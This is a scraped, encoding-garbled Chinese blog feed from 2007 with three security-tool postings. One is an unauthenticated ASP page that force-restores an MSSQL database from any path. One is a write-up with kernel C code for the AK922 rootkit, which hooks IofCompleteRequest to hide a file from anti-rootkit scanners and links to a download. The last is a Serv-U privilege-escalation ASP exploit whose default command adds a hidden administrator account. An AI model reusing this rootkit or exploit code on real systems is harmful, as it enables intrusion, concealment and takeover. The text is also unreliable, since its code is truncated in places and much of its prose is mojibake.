vertical-align: bottom;}</style>
<body>
<form method="post" name="myform" action="?action=backupdatabase">
<table width="686" border="1" align="center">
<tr>
<td width="613" height="30" align="center" bgcolor="#330066"><font color="#FFFFFF">閲囬鎵珹SP澶囦喚MSSQL鏁版嵁搴撶▼搴?V1.0 </font></td>
</tr>
<tr>
<td>閫夋嫨鎿嶄綔錛?br>  <input type="radio" name="act" id="act_backup"value="backup" />
  <label for=act_backup>澶囦喚</label>
  <input type="radio" name="act" id="act_restore" value="restore" />
  <label for=act_restore>鎭㈠</label></td>
</tr>
<tr>
<td><label>SQL鏈嶅姟鍣?
  <input type="text" name="sqlserver" value="localhost" />
</label></td>
</tr>
<tr>
<td><label>鐢ㄦ埛鍚?
  <input name="sqlname" type="text" value="sa" />
瀵?鐮?
<input type="text" name="sqlpassword" />
</label></td>
</tr>
<tr>
<td><label>鏁版嵁搴撳悕錛?br>  <input type="text" name="databasename" value="<%=request("databasename")%>" />
</label></td>
</tr>
<tr>
<td>鏂囦歡璺緞錛?br>  <input name="bak_file" type="text" value="<% =server.MapPath("\")&"\"&"liuyes.bak"%>" size="60" />
(澶囦喚鎴栨仮澶嶇殑鏂囦歡璺緞)</td>
</tr>
<tr>
<td><% Response.write "鏈枃浠剁粷瀵硅礬寰?" %>
  <font color="#FF0000">
  <% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
  </font></td>
</tr>
<tr>
<td><input name=submit1 type="submit" class="liuyes" id=submit1 size="10" value="紜?瀹? />
    <input name="Submit" type="reset" class="liuyes" size="10" value="閲?緗? /></td>
</tr>
</table>
</form>
<table width="686" border="1" align="center">
<tr>
<td>鎻愮ず淇℃伅:<%
' Handler for the form above. Every input -- SQL Server address, login,
' password, database name, file path and the backup/restore switch -- is read
' straight from the request; nothing in this file checks who the caller is.
' The file path is handed to the server unchanged, and a restore is forced over
' the existing database (ReplaceDatabase=True), so whoever can reach this page
' can overwrite the live database from a file of their choosing.
if request("action")="" then  
response.write "<font color=#ff0000>涓嶇敤鎴戝璇翠粈涔堜簡(jiǎn)鍚э紒</font>"
end if
'SQL Server database backup and restore
if request("action")="backupdatabase" Then
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
' The page logs in to whatever server the request names, with whatever
' credentials it supplies.
sqlserver = trim(request("sqlserver"))
sqlname = trim(request("sqlname"))
sqlpassword =trim(request("sqlpassword"))
sqlLoginTimeout = 15
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
' A literal "$1" in the submitted path is expanded to the database name.
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "<font color=#ff0000>娌℃湁杈撳叆鏁版嵁搴撳悕縐?</font>"
else
if act = "backup" then
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.CreateObject("SQLDMO.Backup")
bak.Database=databasename
' NOTE(review): "Files" is never assigned anywhere in this file, so Devices
' receives Empty here; presumably SQLDMO tolerates that -- verify.
bak.Devices=Files
bak.Action   = 0
bak.Initialize   = 1
'bak.Replace   = True
bak.Files=bak_file
bak.SQLBackup srv
' No "On Error Resume Next" is set in this file, so a failing SQLDMO call
' raises a script error before this check is reached; and when it is reached
' the success line below is written regardless of err.number.
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
Response.write "<font color=green>澶囦喚鎴愬姛!</font>"
elseif act="restore" then
'Restore must be performed while the database is not in use!
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.CreateObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
' NOTE(review): same unassigned "Files" as in the backup branch.
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
' This error check runs BEFORE rest.SQLRestore, so a failed restore is never
' reported here -- compare the backup branch, which checks after SQLBackup.
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.SQLRestore srv
Response.write "<font color=green>鎭㈠鎴愬姛!</font>"
else
Response.write "<font color=red>璇烽夋嫨澶囦喚鎴栨仮澶?</font>"
end if
end if
end if
%></td>
</tr>
</table>
</body>
</html>

 



AK922: 紿佺牬紓佺洏?shù)綆珩攱個(gè)嫻嬪疄鐜版枃浠墮殣钘?/title><link>http://m.shnenglu.com/elva/archive/2007/10/12/34018.html</link><dc:creator>鍙跺瓙</dc:creator><author>鍙跺瓙</author><pubDate>Fri, 12 Oct 2007 03:58:00 GMT</pubDate><guid>http://m.shnenglu.com/elva/archive/2007/10/12/34018.html</guid><wfw:comment>http://m.shnenglu.com/elva/comments/34018.html</wfw:comment><comments>http://m.shnenglu.com/elva/archive/2007/10/12/34018.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://m.shnenglu.com/elva/comments/commentRss/34018.html</wfw:commentRss><trackback:ping>http://m.shnenglu.com/elva/services/trackbacks/34018.html</trackback:ping><description><![CDATA[AK922: 紿佺牬紓佺洏?shù)綆珩攱個(gè)嫻嬪疄鐜版枃浠墮殣钘?br>浣滆咃細(xì)Azy<br>email: Azy000@gmail.com<br>瀹屾垚浜庯細(xì)2007-08-08<br><br>   鐩墠錛屼竴浜涘凡鍏紑鐨勪富嫻乤nti-rootkit媯(gè)嫻嬮殣钘忔枃浠朵富瑕佹湁涓ょ鏂規(guī)硶錛氱涓縐嶆槸鏂囦歡緋葷粺灞傜殑媯(gè)嫻嬶紝灞炰簬榪欎竴綾葷殑鏈塱cesword錛宒arkspy錛実mer絳夈傜浜岀渚挎槸紓佺洏綰у埆鐨勪綆綰ф嫻嬶紙Disk Low-Level Scanning錛夛紝灞炰簬榪欎竴綾葷殑ark涔熷緢澶氾紝鍏稿瀷浠h〃涓簉ootkit unhooker錛宖ilereg錛坕s鐨勬彃浠訛級(jí)錛宺ootkit revealer錛宐lacklight絳夈傚綋鐒?dòng)灱寴q樻湁涓浜涘伐鍏鳳紝瀹冧滑鍦ㄥ簲鐢ㄥ眰涓婇氳繃璋冪敤ZwQueryDirectoryFile鏉ュ疄鏂芥嫻嬨?br>   椹卞姩涔熷ソ錛屽簲鐢ㄤ篃緗紝璇寸櫧浜?jiǎn)灏辨槸鐩存帴鎴栭棿鎺ュ彂閫両RP鍒頒笅灞傞┍鍔ㄣ傜涓綾葷殑鍙戦佸埌FSD涓紙fastfat.sys/ntfs.sys錛夛紝絎簩綾昏鍙戦佸埌紓佺洏椹卞姩錛坉isk.sys錛夛紝鑰屽悗IRP渚夸細(xì)鎼哄甫鐩稿簲鐨勬枃浠朵俊鎭繑鍥烇紝榪欐椂涓婂眰搴旂敤鍐嶆牴鎹繑鍥炰俊鎭繘琛屽鐞嗗拰鍒ゆ柇銆備絾鏄敱浜嶥isk綰ф瘮FS綰ф洿搴曞眰錛孖RP榪斿洖緇欐垜浠殑鏄洿鍔犳帴榪戞暟鎹師濮嬬粍緇囨柟寮忕殑紓佺洏鎵囧尯淇℃伅錛屾墍浠ュ湪Disk灞備笂瀹炴柦鏂囦歡媯(gè)嫻嬪彲浠ュ緱鍒版洿浠や漢淇℃湇鐨勭粨鏋溿備絾榪欏茍涓嶇瓑浜庤榪欑被媯(gè)嫻嬩笉鑳借鍑昏觸銆傛湰鏂囧氨灝嗕粙緇嶄竴縐嶇粫榪囪綾繪嫻嬬殑瀹炵幇鏂規(guī)硶錛屽綋鐒?dòng)灱寴q欎篃鏄湪AK922涓嬌鐢ㄧ殑銆?br>   瀵逛簬瑕佸疄鐜版枃浠墮殣钘忕殑RK錛屼笌鍏惰鏄?#8220;緇曡繃”錛岃繕?shù)笉濡傝鏄?#8220;鎷︽埅” -- 鎸傞挬鏌愪簺鍐呮牳鍑芥暟璋冪敤錛屼互渚垮湪榪斿洖涓婂眰涔嬪墠鎴戜滑鏈夋満浼?xì)杩囨护鎺夊緟闅愯棌鏂囦欢鐨勪俊鎭?br>   AK922閲囩敤鐨勬柟娉曟槸Hook鍐呮牳鍑芥暟IofCompleteRequest銆傝繖涓嚱鏁板緢鏈夋剰鎬濓紝鍥犱負(fù)瀹冧笉浠呮槸涓涓嚑涔庡湪浠諱綍椹卞姩涓兘瑕佽皟鐢ㄧ殑鍑芥暟錛岃屼笖鍙傛暟涓濂藉惈鏈塈RP銆傛湁浜?jiǎn)IRP錛屽氨鏈変簡(jiǎn)涓鍒囥傝繖浜涚壒鎬у喅瀹氫簡(jiǎn)瀹冨緢閫傚悎鍋氭垜浠殑“鍌(gè)鍎?#8221;銆備絾鏇撮噸瑕佺殑鏄紝涓鑸湪椹卞姩涓皟鐢↖ofCompleteRequest涔嬫椂IRP鎿嶄綔閮藉凡瀹屾瘯錛孖RP涓浉鍏沖煙宸茬粡濉厖浜?jiǎn)鍐呭锛寴q欏氨渚夸簬鎴戜滑鐫鎵嬬洿鎺ヨ繘琛岃繃婊よ屼笉鐢ㄥ啀鍋氳濡傚彂閫両RP瀹夎瀹屾垚渚嬬▼涔嬬被鐨勬搷浣溿?br>   涓嬮潰灝辯潃閲嶈涓涓嬪伐浣滄祦紼嬶細(xì)<br>   
棣栧厛錛屽垽鏂璏ajorFunction鏄笉鏄疘RP_MJ_READ浠ュ強(qiáng)IO鍫嗘爤涓殑DeviceObject鏄惁鏄鐩橀┍鍔ㄧ殑璁懼瀵硅薄錛屽洜涓鴻繖鎵嶆槸鎴戜滑瑕佸鐞嗙殑鏍稿績(jī)IRP錛屾墍鏈塧rk鐩存帴鍙戦佸埌Disk灞傜殑IRP鍦ㄨ繖閲岄兘鍙互琚嫤鎴埌銆?br>   鎺ヤ笅鏉ョ殑澶勭悊瑕佺壒鍒敞鎰忥紝榪涘叆鍒拌繖閲屾椂IRQL鏄湪APC_LEVEL浠ヤ笂鐨勶紝鍥犳鎴戜滑涓嶈兘紕?lì)C換浣旾RP涓殑鐢ㄦ埛妯″紡緙撳啿鍖猴紝涓紕版瀬鏈夊彲鑳借摑錛屼篃灝辨槸璇存垜浠笉鑳界洿鎺ュ鐞嗙浉鍏崇鐩樻墖鍖轟俊鎭紝鑰屽繀欏婚氳繃ExQueueWorkItem鎺掗槦涓涓猈orkItem鐨勬柟娉曟潵澶勭悊銆傞櫎姝や箣澶栵紝鐢變簬Disk灞傚湪璁懼鍫嗘爤涓浜庨潬涓嬬殑浣嶇疆錛屽ぇ閮ㄥ垎IRP鍙戝埌榪欓噷鏃跺綋鍓嶈繘紼嬩笂涓嬫枃鏃╁凡涓嶆槸鍘熷IRP鍙戣搗鑰呯殑榪涚▼涓婁笅鏂囦簡(jiǎn)錛岃繖閲岀殑鍙戣搗鑰呭簲鐞嗚В涓篴rk榪涚▼銆傚垢榪愮殑鏄湪IRP鐨凾ail.Overlay.Thread鍩熶腑榪樹(shù)繚瀛樼潃鍘熷ETHREAD鎸囬拡錛屼負(fù)浜?jiǎn)鎿嶄綔鐢ㄦ堜hā寮忕紦鍐插尯錛屽繀欏昏皟鐢↘eAttachProcess鍒囧埌IRP鍙戣搗鑰呯殑涓婁笅鏂囩幆澧冧腑錛岃岃繖涓伐浣滃彧鑳藉湪澶勪簬PASSIVE_LEVEL綰т笂鐨勫伐浣滆呯嚎紼嬩腑鎵ц銆傚湪DISPATCH_LEVEL綰т笂錛屽仛鐨勪簨瓚婂皯瓚婂ソ銆?br>   鍒氬紑濮嬫垜榪樺垎涓ょ鎯呭喌榪涜澶勭悊錛氬洜涓哄茍涓嶆槸鎵鏈夌殑IRP閮戒笉澶勫湪鍘熷涓婁笅鏂囦腑錛屾瘮濡俰cesword鍙戠殑IRP鍒拌繖閲岃繕鏄鍦╥cesword.exe榪涚▼涓殑錛岃繖鏃舵垜璁や負(fù)鍙互涓嶇敤鎺掗槦宸ヤ綔欏癸紝榪欐牱灝卞彲浠ヨ妭鐪佸緢澶氱郴緇熻祫婧愶紝鎻愰珮榪囨護(hù)鏁堢巼銆備簬鏄垜璇曞浘鍦―ISPATCH_LEVEL綰т笂鐩存帴鎿嶄綔鐢ㄦ埛緙撳啿鍖猴紝浣嗚繖鏍規(guī)湰琛屼笉閫氥傞┍鍔ㄥ緢涓嶇ǔ瀹氾紝涓嶄竴浼?xì)灏辫摑浜?jiǎn)銆傛晠绱㈡ц佽佸疄瀹炲湴鎺掗槦鍘諱簡(jiǎn)錛岀劧鍚庡啀鍒嗘儏鍐靛鐞嗐備唬鐮佸涓嬶細(xì)<br><br>// 澶勭悊Disk Low-Level Scanning<br>if(irpSp->MajorFunction == IRP_MJ_READ && IsDiskDrxDevice(irpSp->DeviceObject) && irpSp->Parameters.Read.Length != 0)<br>{    <br>        <br>    orgnThread = Irp->Tail.Overlay.Thread;<br>    orgnProcess = IoThreadToProcess(orgnThread);<br>        <br>    if(Irp->MdlAddress)<br>    {        <br>        UserBuffer = (PVOID)((ULONG)Irp->MdlAddress->StartVa + Irp->MdlAddress->ByteOffset);<br>            <br>        // UserBuffer蹇呴』鏈夋晥<br>        if(UserBuffer)<br>        {                    <br>            <br>            if(KeGetCurrentIrql() == DISPATCH_LEVEL)<br>            {                    <br>            <br>                RtlZeroMemory(WorkerCtx, sizeof(WORKERCTX));<br>                <br>                WorkerCtx->UserBuffer = UserBuffer;<br>                WorkerCtx->Length = irpSp->Parameters.Read.Length;<br>                WorkerCtx->EProc = orgnProcess;<br>                <br>                ExInitializeWorkItem(&WorkerCtx->WorkItem, WorkerThread, WorkerCtx);<br>        
                        <br>                ExQueueWorkItem(&WorkerCtx->WorkItem, CriticalWorkQueue);<br>            } <br>        }<br>        <br>    }<br>}<br>  <br><br>   鏉ュ埌宸ヤ綔鑰呯嚎紼嬶紝鍒頒簡(jiǎn)PASSIVE_LEVEL綰т笂錛屽垏鎹笂涓嬫枃涔嬪悗錛屼技涔庡畨鍏ㄥ浜?jiǎn)銆備絾鏄互闃蹭竾涓錛屾搷浣滅敤鎴鋒ā寮忕紦鍐插尯涔嬪墠榪樻槸瑕佽皟鐢≒robeForXxx鍑芥暟鍏堝垽鏂竴涓嬨傜浉鍏充唬鐮佸涓嬶細(xì)<br><br>VOID WorkerThread(PVOID Context)<br>{<br>    KIRQL irql;<br>    PEPROCESS eproc = ((PWORKERCTX)Context)->orgnEProc;<br>    PEPROCESS currProc = ((PWORKERCTX)Context)->currEProc;<br>    //PMDL mdl;<br>        <br><br>    if(((PWORKERCTX)Context)->UserBuffer)<br>    {<br>        if(eproc != currProc)<br>        {<br><br>            KeAttachProcess(eproc);<br><br>            __try{<br>            <br>                // ProbeForWrite must be running <= APC_LEVEL<br>                ProbeForWrite(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length, 1);<br>                HandleAkDiskHide(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length);<br>            }<br><br>            __except(EXCEPTION_EXECUTE_HANDLER){<br><br>                //DbgPrint("we can't op the buffer now :-(");<br>                KeDetachProcess();    <br>                return;<br>            }<br>            <br>            KeDetachProcess();    <br>            <br>        }else{<br><br>            __try{<br>            <br>                // ProbeForWrite must be running <= APC_LEVEL<br>                ProbeForWrite(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length, 1);<br>                HandleAkDiskHide(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length);<br>            }<br><br>            __except(EXCEPTION_EXECUTE_HANDLER){}<br>        }<br>    <br>    }<br>}<br><br>   鍑嗗宸ヤ綔緇堜簬綆楁槸鍋氬緱宸笉澶氫簡(jiǎn)錛屼笅闈㈠氨寮濮嬬湡姝f秱鏀圭鐩樻墖鍖哄唴瀹逛簡(jiǎn)銆傝繖閲屽皢娑夊強(qiáng)鍒癋AT32鍜孨TFS紓佺洏鏂囦歡緇撴瀯錛屾垜鍏堟妸瑕佺敤鍒扮殑涓昏緇撴瀯鍒楀嚭鏉ワ紝鍏朵綑鐨勫ぇ瀹跺彲浠ュ弬鑰冦奛TFS Documentation銆嬨?br><br>typedef struct _INDEX_HEADER{<br>    UCHAR            magic[4];<br>    USHORT            
UpdateSequenceOffset;<br>    USHORT            SizeInWords;<br>    LARGE_INTEGER    LogFileSeqNumber;<br>    LARGE_INTEGER    VCN;<br>    ULONG            IndexEntryOffset;    // needed!<br>    ULONG            IndexEntrySize;<br>    ULONG            AllocateSize;<br>}INDEX_HEADER, *PINDEX_HEADER;<br><br><br>typedef struct _INDEX_ENTRY{<br>    LARGE_INTEGER        MFTReference;<br>    USHORT            Size;                // needed!<br>    USHORT            FileNameOffset;<br>    USHORT            Flags;<br>    USHORT            Padding;<br>    LARGE_INTEGER        MFTReferParent;<br>    LARGE_INTEGER        CreationTime;<br>    LARGE_INTEGER        ModifyTime;<br>    LARGE_INTEGER        FileRecModifyTime;<br>    LARGE_INTEGER        AccessTime;<br>    LARGE_INTEGER        AllocateSize;<br>    LARGE_INTEGER        RealSize;<br>    LARGE_INTEGER        FileFlags;<br>    UCHAR            FileNameLength;<br>    UCHAR            NameSpace;<br>    WCHAR            FileName[1];<br>}INDEX_ENTRY, *PINDEX_ENTRY;<br><br>   鍦ㄨ鍙栫鐩樻枃浠朵俊鎭椂姣忔閮芥槸浠ヤ竴涓墖鍖哄ぇ灝忥紙512 bytes錛夌殑鏁存暟鍊嶈繘琛岀殑錛屽鏋滀笉浜?jiǎn)瑙g浉搴斿嶏L(fēng)殑緇勭粐褰㈠紡鍜屾暟鎹粨鏋勶紝閭d箞鎰熻灝辨槸鏁版嵁澶氳岀箒鏉傦紝鎼滅儲(chǔ)鏁堢巼涔熷緢浣庛備絾杈呬互涓婅堪緇撴瀯渚垮彲蹇熷畾浣嶅緟闅愯棌鏂囦歡騫惰繘琛屾秱鏀廣傝繖閲屼笉寰椾笉璇翠竴鍙ワ紝綆楁硶鐨勯珮鏁堟槸寰堥噸瑕佺殑錛屽鏋滈噰鐢ㄦ毚鍔涙悳绱㈢殑鏂瑰紡錛岄偅涔堢郴緇烞SOD鐨勬鐜囦細(xì)澶уぇ澧炲姞銆?br>   鍦‵AT32鍗蜂笂錛屽綋AK922鎼滅儲(chǔ)鍒版枃浠禔K922.sys鐨勭洰褰曢」鏃訛紝灝嗗叾0x0鍋忕Щ澶勭殑鏂囦歡鍚嶇殑絎竴涓瓧鑺傜疆涓?0xe5"錛屽嵆鏍囪涓哄垹闄ゃ傝繖鏍峰嵆鍙揪鍒版楠梐rk鐨勭洰鐨勩備絾涓轟簡(jiǎn)鏇村姞闅愯斀錛屼笉璁﹚inhex瀵熻鍑烘潵錛屾渶濂芥妸鏂囦歡鍚嶅叏閮ㄦ竻0銆?br>   澶勭悊NTFS鍗風(fēng)◢寰夯鐑?chǔ)浜涘Q屾枃浠惰褰曞拰绱㈠紩欏歸兘瑕佹姽騫插噣錛屽叿浣撳疄鐜拌浠g爜錛岃繖閲屼笉鍐嶈禈榪般?br><br>VOID HandleAkDiskHide(PVOID UserBuf, ULONG BufLen)<br>{<br>    ULONG i;<br>    BOOLEAN bIsNtfsIndex;<br>    BOOLEAN bIsNtfsFile;<br>    ULONG offset = 0;<br>    ULONG indexSize = 0;<br>    PINDEX_ENTRY currIndxEntry = NULL;<br>    PINDEX_ENTRY preIndxEntry = NULL;<br>    ULONG currPosition;<br><br>    <br>    bIsNtfsFile = (_strnicmp(UserBuf, NtfsFileRecordHeader, 4) == 0);<br>    bIsNtfsIndex = (_strnicmp(UserBuf, NtfsIndexRootHeader, 4) == 0);<br><br>    
if(bIsNtfsFile == FALSE && bIsNtfsIndex == FALSE)<br>    {            <br>    <br>        for(i = 0; i < BufLen/0x20; i++)<br>        {<br>            if(!_strnicmp(UserBuf, fileHide, 5) && !_strnicmp((PVOID)((ULONG)UserBuf+0x8), fileExt, 3))<br>            {<br><br>                *(PUCHAR)UserBuf        = 0xe5;<br>                *(PULONG)((ULONG)UserBuf + 0x1)    = 0;<br><br>                break;<br>                    <br>            }<br><br>            UserBuf = (PVOID)((ULONG)UserBuf + 0x20);<br>        <br>        }<br><br>    } else if(bIsNtfsFile) {<br><br>        //DbgPrint("FILE0...");<br><br>        for(i = 0; i < BufLen / FILERECORDSIZE; i++)<br>        {<br>            if(!_wcsnicmp((PWCHAR)((ULONG)UserBuf + 0xf2), hideFile, 9))<br>            {<br>                memset((PVOID)UserBuf, 0, 0x4);<br>                memset((PVOID)((ULONG)UserBuf + 0xf2), 0, 18);<br>                break;<br>            }<br>                <br>            UserBuf = (PVOID)((ULONG)UserBuf + FILERECORDSIZE);<br>                <br>        }<br>            <br>    } else if(bIsNtfsIndex) {<br>                            <br>        //DbgPrint("INDX...");<br>        // Index Entries<br>        <br>        offset = ((PINDEX_HEADER)UserBuf)->IndexEntryOffset + 0x18;<br>        indexSize = BufLen - offset;<br>        currPosition = 0;<br><br>        currIndxEntry = (PINDEX_ENTRY)((ULONG)UserBuf + offset);<br>        //DbgPrint(" -- offset: 0x%x indexSize: 0x%x", offset, indexSize);<br>                <br>        while(currPosition < indexSize && currIndxEntry->Size > 0 && currIndxEntry->FileNameOffset > 0)<br>        {<br>            if(!_wcsnicmp(currIndxEntry->FileName, hideFile, 9))<br>            {<br>                memset((PVOID)currIndxEntry->FileName, 0, 18);<br><br>                if(currPosition == 0)<br>                {<br>                    ((PINDEX_HEADER)UserBuf)->IndexEntryOffset += currIndxEntry->Size;<br>                    break;<br>                
}<br><br>                preIndxEntry->Size += currIndxEntry->Size;<br>                <br>                break;<br>            }<br><br>            currPosition += currIndxEntry->Size;<br>            preIndxEntry = currIndxEntry;<br>            currIndxEntry = (PINDEX_ENTRY)((ULONG)currIndxEntry + currIndxEntry->Size);<br>                    <br>        }<br>    }<br>}<br><br>   姘村鉤鏈夐檺錛屾榪庡ぇ瀹朵笌鎴戜氦嫻併?br><br><br>鍙傝冭祫鏂欙細(xì)<br><br>[1] - 銆奛TFS Documentation銆?br>[2] - Azy錛屻奍ceSword & Rootkit Unhooker椹卞姩綆鏋愩?br><br>---------<br><br>鍏充簬AK922(AzyKit)錛氭垜鍐欑殑涓涓彧瀹炵幇鏂囦歡闅愯棌鐨凴K錛屽彲浠ypass鏈枃鎻愬埌鐨勬墍鏈塧rk銆?br>Download @ <a target=_blank><u><font color=#0000ff>http://www.wiiupload.net/sf/65b4e75ec4</font></u></a> <img src ="http://m.shnenglu.com/elva/aggbug/34018.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.shnenglu.com/elva/" target="_blank">鍙跺瓙</a> 2007-10-12 11:58 <a href="http://m.shnenglu.com/elva/archive/2007/10/12/34018.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>鍒嗕韓serv-u鍒╃敤鑴氭湰(asp/aspx/php/perl)http://m.shnenglu.com/elva/archive/2007/08/04/29350.html鍙跺瓙鍙跺瓙Sat, 04 Aug 2007 07:17:00 GMThttp://m.shnenglu.com/elva/archive/2007/08/04/29350.htmlhttp://m.shnenglu.com/elva/comments/29350.htmlhttp://m.shnenglu.com/elva/archive/2007/08/04/29350.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/29350.htmlhttp://m.shnenglu.com/elva/services/trackbacks/29350.htmlASP


<%
'Serv-U ASP privilege-escalation program
'author: Goldsun[at]84823714
'DO NOT use it to do evil things!
' Three-step page driven by the numeric "action" field: 1 = log in to the
' Serv-U admin port and create a throw-away domain "goldsun" (port 65500) with
' user go/od, 2 = log in as that user and hand "c" to "site exec", 3 = log in
' again and delete the domain. All values (user, password, port, command,
' drive) come from the request; the page itself performs no authentication.
' From a defender's side the visible artefacts are loopback connections made
' by the web-server process and a transient FTP domain on port 65500.
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
' Non-numeric actions end the response silently.
if  not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
' Drive for the new account's home directory: the first two characters of "f",
' or the Windows drive found by Gpath() when "f" is empty.
f=trim(request("f"))
if f="" then
f=gpath()
else
   f=left(f,2)
end if
ftpport = 65500
' Assigned but not used anywhere in this file.
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
' Swap the hard-coded "c:" (HomeDir and Access lines) for the chosen drive.
newuser=replace(newuser,"c:",f)
select case action
case 1
    ' Step 1: admin login, delete any stale domain, create the domain and user.
    ' NOTE(review): the next line is truncated in this copy -- the open() URL
    ' and the send() call have been merged into a single string literal.
    set a=Server.CreateObject("Microsoft.XMLHTTP")
    a.open "GET", "    a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
    set session("a")=a
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="2"></form>
<script language="javascript">
document.write('<center>姝e湪榪炴帴 127.0.0.1:<%=port%>,浣跨敤鐢ㄦ埛鍚? <%=user%>,鍙d護(hù)錛?lt;%=pass%>...<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 2
    ' Step 2: log in as go/od and pass the command to "site exec".
    ' NOTE(review): the open() URL is also missing on this line in this copy.
    set b=Server.CreateObject("Microsoft.XMLHTTP")
    b.open "GET", "
    b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
   set session("b")=b
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="3"></form>
<script language="javascript">
document.write('<center>姝e湪鎻愬崌鏉冮檺,璇風(fēng)瓑寰?..,<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 3
    ' Step 3: admin login again and remove the temporary domain.
    ' NOTE(review): open() URL truncated here as well.
    set c=Server.CreateObject("Microsoft.XMLHTTP")
    c.open "GET", "
    c.send loginuser & loginpass & mt & deldomain & quit
    set session("c")=c
%>
<center>鎻愭潈瀹屾瘯,宸叉墽琛屼簡(jiǎn)鍛戒護(hù)錛?lt;br><font color=red><%=cmd%></font><br><br>
<input type=button value=" 榪斿洖緇х畫 " onClick="location.href='<%=gname()%>';">
</center>
<%
case else
' Default view: abort and drop any XMLHTTP objects a previous run left in the
' session (errors ignored), then render the input form.
on error resume next
    set a=session("a")
    set b=session("b")
    set c=session("c")
    a.abort
    Set a = Nothing
    b.abort
    Set b = Nothing
    c.abort
    Set c = Nothing
%>
<center><form method="post" name="goldsun">
<table width="494" height="163" border="1" cellpadding="0" cellspacing="1" bordercolor="#666666">
  <tr align="center" valign="middle">
    <td colspan="2">Serv-U 鎻愬崌鏉冮檺 ASP鐗?Goldsun[at]84823714</td>
  </tr>
  <tr align="center" valign="middle">
    <td width="100">鐢ㄦ埛鍚?</td>
    <td width="379"><input name="u" type="text" id="u" value="LocalAdministrator"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>鍙c浠わ細(xì)</td>
    <td><input name="p" type="text" id="p" value="
#l@$ak#.lk;0@P"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>绔鍙o細(xì)</td>
    <td><input name="port" type="text" id="port" value="43958"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>緋葷粺璺緞錛?lt;/td>
    <td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>鍛姐浠わ細(xì)</td>
    <td><input name="c" type="text" id="c" value="cmd /c net user goldsun love /add & net localgroup administrators goldsun /add" size="50"></td>
  </tr>
 
  <tr align="center" valign="middle">
